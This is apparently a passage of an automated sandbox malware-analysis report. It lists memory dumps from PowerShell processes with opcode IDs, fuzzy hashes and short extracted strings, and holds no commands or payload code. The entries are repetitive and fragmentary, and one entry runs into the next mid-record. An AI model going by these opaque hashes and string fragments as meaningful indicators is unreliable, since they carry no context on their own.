                                                                                      • Source File: 00000001.00000002.2850351977.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1eeafb39882a18320920be99d1280aa52de208b4e373adc283c6401737e2fa09
                                                                                      • Instruction ID: dfa3755b5be7ef6308fa8a313425ae09fe7253b300be83e304c65ef929a9e2d7
                                                                                      • Opcode Fuzzy Hash: 1eeafb39882a18320920be99d1280aa52de208b4e373adc283c6401737e2fa09
                                                                                      • Instruction Fuzzy Hash: DDB12531E0EA8A4FE796EB2C98555B5BBE1EF57290F8801FAD00DC71D3DE28AC058355
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2850351977.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b1c1f6b04db24386fd15bb6e626623c9d493d02aa17c62126df652aebc59328
                                                                                      • Instruction ID: 44ec46b42eef9f7c9b42b33cadaa6ff2bb32824d2a311ec7a481042c98de5813
                                                                                      • Opcode Fuzzy Hash: 1b1c1f6b04db24386fd15bb6e626623c9d493d02aa17c62126df652aebc59328
                                                                                      • Instruction Fuzzy Hash: 0F31D432E1EA864FF7AAA72C5815178AAD1EF476A0F9801FAE40DC71D3DF1C6C14421A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n$x6n
                                                                                      • API String ID: 0-296243896
                                                                                      • Opcode ID: 1794bc431c44b99540e7c5b8776aefae6092375c31f72dd2fb384f2f24b04e50
                                                                                      • Instruction ID: 246a8a0154c20af8e824e6c928629525d6767057008a82ca9f8daf246781f55c
                                                                                      • Opcode Fuzzy Hash: 1794bc431c44b99540e7c5b8776aefae6092375c31f72dd2fb384f2f24b04e50
                                                                                      • Instruction Fuzzy Hash: 9C022561E1D94A4FE399EA2C985A779B7D2FF98780F9441BAC00DC72D2CF386C428345
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-2265583125
                                                                                      • Opcode ID: 49f33c243e37133078c48054b8b1073fa91b6b570dd3fa9952ba1b46a93eb6cd
                                                                                      • Instruction ID: fa9216809a7224d3f2d1f91e7d0307785658de46fbf3c3f15990ab8d46efb09d
                                                                                      • Opcode Fuzzy Hash: 49f33c243e37133078c48054b8b1073fa91b6b570dd3fa9952ba1b46a93eb6cd
                                                                                      • Instruction Fuzzy Hash: 71625EB4A402189FDB14DB64C991BAEBBB2EF84304F1085E5D9096F395CB359E81CF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$:
                                                                                      • API String ID: 0-1641663427
                                                                                      • Opcode ID: 6259469b4a7a024d67de668bd2bd20fac979dc6ee4ffe2a2c460baade71c6225
                                                                                      • Instruction ID: dd67ab1ea8f532e6110e44a23d04cfd6aab041e470d21b974ac94f86aab30cb6
                                                                                      • Opcode Fuzzy Hash: 6259469b4a7a024d67de668bd2bd20fac979dc6ee4ffe2a2c460baade71c6225
                                                                                      • Instruction Fuzzy Hash: B3C181B4B00214DFDB28DB54C991BAEBBB2EF84304F1084A9D5096F395CB75DD86CB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-3975720690
                                                                                      • Opcode ID: 6c7e3769300b0299d5fdb9fefa679bcff442e34a2b5a266ee2372ad1d0de9a2d
                                                                                      • Instruction ID: 21ff073a669a70a3a768c31c659fe61913f884fc8ccf2ce1baadb3ab18ff591a
                                                                                      • Opcode Fuzzy Hash: 6c7e3769300b0299d5fdb9fefa679bcff442e34a2b5a266ee2372ad1d0de9a2d
                                                                                      • Instruction Fuzzy Hash: 5BD1B2B4B002059FDB18DB68C551BAEBBB2EF85304F15C429D8056F395CB76DC46CBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-4000621977
                                                                                      • Opcode ID: 90d2c1fe2bcd88314de7ea3437a06c443722bb045e20396760b81d13d1e79f4a
                                                                                      • Instruction ID: 0f6b17a026dd7e059fa0c9707c168eda5e95acf8120adcbcdbbd496fdaea9342
                                                                                      • Opcode Fuzzy Hash: 90d2c1fe2bcd88314de7ea3437a06c443722bb045e20396760b81d13d1e79f4a
                                                                                      • Instruction Fuzzy Hash: 262237F1B053139FE7199A78881177ABBE6AFC1310F1484BAD809DF695DB36C841C7A2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hnq$$jq$$jq
                                                                                      • API String ID: 0-266315406
                                                                                      • Opcode ID: 9661dc0d474f586a7bdb2346d0d3a8615f83a009ddbbc4d01c67adabb821c254
                                                                                      • Instruction ID: 7ecf17ca3687d0c9f3805feb58cf9c250bdf6191dfff09ddf9b519488d196f2d
                                                                                      • Opcode Fuzzy Hash: 9661dc0d474f586a7bdb2346d0d3a8615f83a009ddbbc4d01c67adabb821c254
                                                                                      • Instruction Fuzzy Hash: 27225F34B002149FCB25DB64C964BAEB7F6BF89305F1444A9D40AAB3A5CB35DE85CF81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq
                                                                                      • API String ID: 0-3078559419
                                                                                      • Opcode ID: cb72ebbbdf442d4010f9ba660c317fcc10b72765a53c9b88704f0baee32cb061
                                                                                      • Instruction ID: fc3aae8cd994baa87e1a024161657271b8d688db8e4f106285462345a9ad6739
                                                                                      • Opcode Fuzzy Hash: cb72ebbbdf442d4010f9ba660c317fcc10b72765a53c9b88704f0baee32cb061
                                                                                      • Instruction Fuzzy Hash: 4CB1B2B4A002059FDB18CF54C551BAEBBB2EF89304F15C469D8096F395CB76EC46CBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $jq$$jq$$jq
                                                                                      • API String ID: 0-3696375380
                                                                                      • Opcode ID: 849a39fe00027f4252b04f56f9f9d075cad3651786bc393c7c29f1b888c004dd
                                                                                      • Instruction ID: 2a2c3fb0659c83c995817b4e9dc582a1e6e558b771d3e86b4938d3c61cd01865
                                                                                      • Opcode Fuzzy Hash: 849a39fe00027f4252b04f56f9f9d075cad3651786bc393c7c29f1b888c004dd
                                                                                      • Instruction Fuzzy Hash: CA513AB570430A9FE72C9A69C80076BBBA6EFC6310F14C4BBD54DDB681DA35C981C7A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: 573ca568276a3d693511bdb617b682a6d42a4496625801cd17aae35eb1d3586c
                                                                                      • Instruction ID: 4c0a0ebcb6a8be91fbd9e893acb7f11ac5e0c012a218312944c70d5b4c2aa368
                                                                                      • Opcode Fuzzy Hash: 573ca568276a3d693511bdb617b682a6d42a4496625801cd17aae35eb1d3586c
                                                                                      • Instruction Fuzzy Hash: 0E024EB4A402199FD724DB24C990BAEBBB2EF84304F1081E5D94D6F795CB719E81CF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: 809755ee576ca45e79aef34127ec18158588cf880d613dca728b90522a67335e
                                                                                      • Instruction ID: 760f53833a97c338922179f1b6eb87b92011184df563505fa740862191b6d936
                                                                                      • Opcode Fuzzy Hash: 809755ee576ca45e79aef34127ec18158588cf880d613dca728b90522a67335e
                                                                                      • Instruction Fuzzy Hash: ACF1A0B4B00215DFEB28DB68C951F6EBBA6AF84304F10C4A5E4096F7A5CB71DD41CB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: 39ce998c0d759f34782c7613a6847461980cc81bd3225ce17d0028a76c7e68e1
                                                                                      • Instruction ID: 0f152a88b6712b157cbec3569cea5b54547840a3cf3933030901528847588e40
                                                                                      • Opcode Fuzzy Hash: 39ce998c0d759f34782c7613a6847461980cc81bd3225ce17d0028a76c7e68e1
                                                                                      • Instruction Fuzzy Hash: 9CE1B4B0B402149FD714EB28C955BAEBBA2EF84304F10C5A9D9096F395CF75DD818F92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84l$tPjq
                                                                                      • API String ID: 0-2912020916
                                                                                      • Opcode ID: 9b12ec1914d77652d5dc5ac4e1fff9fa48f15b9e5d47475fd8f539cb24ebb30e
                                                                                      • Instruction ID: 726abe40ce4a7a32a0f338b2549a819d94d67305db90510278366bdb0c320ea4
                                                                                      • Opcode Fuzzy Hash: 9b12ec1914d77652d5dc5ac4e1fff9fa48f15b9e5d47475fd8f539cb24ebb30e
                                                                                      • Instruction Fuzzy Hash: E851B0B07493C59FD7168B648C24A56BFB1BF87204F1AC0EBD5488F1A3C6769C46C762
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq
                                                                                      • API String ID: 0-1204115232
                                                                                      • Opcode ID: caeb0e4bb42d1247806ea288c330610cb6b8823e1e727c984285be6b7788fde9
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28d34e76b6898d3b83dbdcc04003b79c71693c8dd4c3d1182ec94dcb69b08c7c
                                                                                      • Instruction ID: 1164987f1f244492a67868f9bf7ba955085c7310656a8b0120ce2a413dcef02a
                                                                                      • Opcode Fuzzy Hash: 28d34e76b6898d3b83dbdcc04003b79c71693c8dd4c3d1182ec94dcb69b08c7c
                                                                                      • Instruction Fuzzy Hash: B1313D30A051188FCB26DB64C955BEEB7F6BF4A309F1044E9D40AAB351CB759E81CF81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 531368cfd223575f1eeb91346725b8be40f30875c5447847eeed5a0cc5aed0a0
                                                                                      • Instruction ID: 09e8cd1b5e1ff0205aefc2918e7c22822c24a491313a323af3939c3e70bc4b41
                                                                                      • Opcode Fuzzy Hash: 531368cfd223575f1eeb91346725b8be40f30875c5447847eeed5a0cc5aed0a0
                                                                                      • Instruction Fuzzy Hash: 86313A74A00205DFCB54CF98C590AAEFBB2FF48310B258299E419AB795C331ED91CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8dabe08e4fe9e0acdaa8fdcb8de4fb318da8cbbd5b346c844174b256e283973e
                                                                                      • Instruction ID: 587c0dabccf270d5d943f699e900aa027135878b75b38762daa965cb3ce80e9c
                                                                                      • Opcode Fuzzy Hash: 8dabe08e4fe9e0acdaa8fdcb8de4fb318da8cbbd5b346c844174b256e283973e
                                                                                      • Instruction Fuzzy Hash: A821C174A042099FCB01CFA8D9919AAFFB1FF4A310B054196E445EB352C731ED41CBA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc656b8d77dfacc3e761d5780e0663dca3b28180ddb1e20fb59cb2c03e29510e
                                                                                      • Instruction ID: 09077905b546aaf304146ec3e6deef90571e711bd4c5c43635ecd9d6bfbb3563
                                                                                      • Opcode Fuzzy Hash: dc656b8d77dfacc3e761d5780e0663dca3b28180ddb1e20fb59cb2c03e29510e
                                                                                      • Instruction Fuzzy Hash: 76212A74A042059FCB00CF99C9909AEFBB1FF49310B25819AD849E7761C735EC51CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22cd3accdcbf1b03620707228e62d5d085b786564e2153a89d8239e0b6107577
                                                                                      • Instruction ID: ef25974f2f17a19433197aceae7974720f9dc72fe48c6ef3f612703488fa3fcc
                                                                                      • Opcode Fuzzy Hash: 22cd3accdcbf1b03620707228e62d5d085b786564e2153a89d8239e0b6107577
                                                                                      • Instruction Fuzzy Hash: E4310874A00609DFCB54CF89C590AAAF7F2FF48310B248699E919A7795C731ED91CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51a6434b9ac1993aab43da2ba593cc26021b43777092f76b3f38b109b7347010
                                                                                      • Instruction ID: 095ece786e85201cb05b6b9a04de44a26e6b78f526bb93c1edd25d9f6bef58b1
                                                                                      • Opcode Fuzzy Hash: 51a6434b9ac1993aab43da2ba593cc26021b43777092f76b3f38b109b7347010
                                                                                      • Instruction Fuzzy Hash: 5711C634A05209EFDB05DFA8D494E9DBBB2FF88314F288558E405AB365C771ED86CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2537130801.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_aad000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db6588c2db96c095cc0048ff9163fea004da5bfd6cb690b55f258cdb90198ba7
                                                                                      • Instruction ID: 8c552659e099e35f4ff36384a83e6a4ba1b7a3b7e5bddb4579ef81446703929c
                                                                                      • Opcode Fuzzy Hash: db6588c2db96c095cc0048ff9163fea004da5bfd6cb690b55f258cdb90198ba7
                                                                                      • Instruction Fuzzy Hash: 3A01F7710043409AE7208B25CD84B67FF98EF47720F18C429ED8B1B686C3799841C6B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2537130801.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_aad000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4fc56e369c38b1b2eaffb9a089e8d40706fe73cbdc9f0c113d0b8e11ab050030
                                                                                      • Instruction ID: 28c7b2673222d61228196f8479eb009a9f337cdc9a48f6f451f40e5e3e6cedba
                                                                                      • Opcode Fuzzy Hash: 4fc56e369c38b1b2eaffb9a089e8d40706fe73cbdc9f0c113d0b8e11ab050030
                                                                                      • Instruction Fuzzy Hash: 77F0C271004344AEE7108F16CC84B66FF98EF56734F18C55AED891B686C3799840CAB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2538181363.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2da0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef1967f4abcb66e41401542c6dd35396dc78380a1d6ac82fa9f8bccbcaac9ee8
                                                                                      • Instruction ID: 41dfafea8c034bcb2bd039ee6c8493995f9091a1c431201cf91531ccd9112de1
                                                                                      • Opcode Fuzzy Hash: ef1967f4abcb66e41401542c6dd35396dc78380a1d6ac82fa9f8bccbcaac9ee8
                                                                                      • Instruction Fuzzy Hash: 31F0B431A00108EFCB14CF98DC849AEF775FF88324B248669D859A7690CB36AC13CB51
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-3488220606
                                                                                      • Opcode ID: d6a908f2b93a59652cb85b443aedabe472dec4c96b2a153ca86acdbecc486aee
                                                                                      • Instruction ID: 63fc68d0cf74fc566e4de1e5edb0d087d49d0b2a3261518a9d66547410316506
                                                                                      • Opcode Fuzzy Hash: d6a908f2b93a59652cb85b443aedabe472dec4c96b2a153ca86acdbecc486aee
                                                                                      • Instruction Fuzzy Hash: 7CE12AB170424A9FEB198B78C4106FABFB6EFC2311F1484AAD649CB291DB35C945C7A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-1071302482
                                                                                      • Opcode ID: e54b4ba25c56af8bcd09f8935824d5c46e037d44b1055e75c01d23d825c27df0
                                                                                      • Instruction ID: 9f7885678513cba5a380e9d7b7bd488097b6f2fcae168bc2e6ed40ad42ac8fe5
                                                                                      • Opcode Fuzzy Hash: e54b4ba25c56af8bcd09f8935824d5c46e037d44b1055e75c01d23d825c27df0
                                                                                      • Instruction Fuzzy Hash: 59E107F1B842159FEB19CF68C4507AABBA6EF86210F14D0AAD809CF651DB35CC45C7B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84l$84l$84l$84l$tPjq$tPjq$tPjq$tPjq
                                                                                      • API String ID: 0-2201647080
                                                                                      • Opcode ID: 8fed3c64fded5ebd4b99d68ac3fd5f9ea51fdf5c802d5bdf6ea9f283825ee19d
                                                                                      • Instruction ID: 74ad05797d8e2169160cf49a437ed372082b2731a460293404ebe3b063b49ce1
                                                                                      • Opcode Fuzzy Hash: 8fed3c64fded5ebd4b99d68ac3fd5f9ea51fdf5c802d5bdf6ea9f283825ee19d
                                                                                      • Instruction Fuzzy Hash: 49B105B1B102159FD718DF688940A6ABBE6EFCA310F15C86AE8099F391CB71DC05C7E1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq
                                                                                      • API String ID: 0-2919996211
                                                                                      • Opcode ID: 88aa6b8a340731dabc3f3fafd63605ad7f798e7895412a9cb5b080333f136dca
                                                                                      • Instruction ID: 44d8ab4c55b933a9b963b05386f086c69e4b7c19bfe4acc8b47ab0a62a6d2c30
                                                                                      • Opcode Fuzzy Hash: 88aa6b8a340731dabc3f3fafd63605ad7f798e7895412a9cb5b080333f136dca
                                                                                      • Instruction Fuzzy Hash: D8F14BB27442158FEB189B68880176ABBF5EFC5312F18C47ADC09CB651DB36CD45C7A2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
                                                                                      • API String ID: 0-210473685
                                                                                      • Opcode ID: b17de8d117e52493b4c963c1f5ee9ebd1653aed5f1c83e245cfafdf55f246bc4
                                                                                      • Instruction ID: ccc9cfec8a66f1e7f30bc3065ff09bc530a152d06f8f57221f2160acf20e2fac
                                                                                      • Opcode Fuzzy Hash: b17de8d117e52493b4c963c1f5ee9ebd1653aed5f1c83e245cfafdf55f246bc4
                                                                                      • Instruction Fuzzy Hash: 545137F57043168FEB2D8A69C81067BBBFAEFC2211F14847BD849CB255DA31C885C7A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                                                      • API String ID: 0-728028659
                                                                                      • Opcode ID: f6af3197b8e65f422385abc8433b71aeda0fd9cbaa2962397c318401c36a7464
                                                                                      • Instruction ID: 6025f2d7ac09215c878fe78c89a884d0f7e6599f858dff63c225f9a63ce683e5
                                                                                      • Opcode Fuzzy Hash: f6af3197b8e65f422385abc8433b71aeda0fd9cbaa2962397c318401c36a7464
                                                                                      • Instruction Fuzzy Hash: 8C31A6F2A00215DFFB2C8E85C642766B7F6EB45360F18C1A9D91D5B291CF72D850CBA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'jq$4'jq$4l$4l
                                                                                      • API String ID: 0-4178271061
                                                                                      • Opcode ID: 54a89c1a6ec8ed2ccd6d9a37ce880761903f5a80d0e0be74ca811a1385dff233
                                                                                      • Instruction ID: 530e610530bb1986c4ffbcc055f3d94144debf916887a7a4533001cf7e7a219d
                                                                                      • Opcode Fuzzy Hash: 54a89c1a6ec8ed2ccd6d9a37ce880761903f5a80d0e0be74ca811a1385dff233
                                                                                      • Instruction Fuzzy Hash: 8761C5B0B402059FE718CB68C550B6EBBE6EF89710F149429D809AF754DB36DC41CBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 84l$84l$tPjq$tPjq
                                                                                      • API String ID: 0-2327125206
• Opcode ID: a95df19cc4394e04586b9cf9ee1475d9b8bace5bc52fac21d56934d2e09a92a1
• Instruction ID: e555e48298ec54f3fb35ad4839b7d2ce91a80f05380f16b2b6a41e63507afb60
• Opcode Fuzzy Hash: a95df19cc4394e04586b9cf9ee1475d9b8bace5bc52fac21d56934d2e09a92a1
• Instruction Fuzzy Hash: 9D5193B5B20215DFEB28CE58C540B6AF7E6BF8A310F15C559E809AB790CB71EC41CB90

Strings
Memory Dump Source
• Source File: 00000005.00000002.2547156823.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7310000_powershell.jbxd
Similarity
• API ID:
• String ID: 84l$84l$tPjq$tPjq
• API String ID: 0-2327125206
• Opcode ID: f03c1769be3f73e43598710b4ce2264e70428118df631a50efc77624ec577d79
• Instruction ID: 600b6cdd253ca053c998f724a374df7bc2b28714d6923372e50ff6af980967cd
• Opcode Fuzzy Hash: f03c1769be3f73e43598710b4ce2264e70428118df631a50efc77624ec577d79
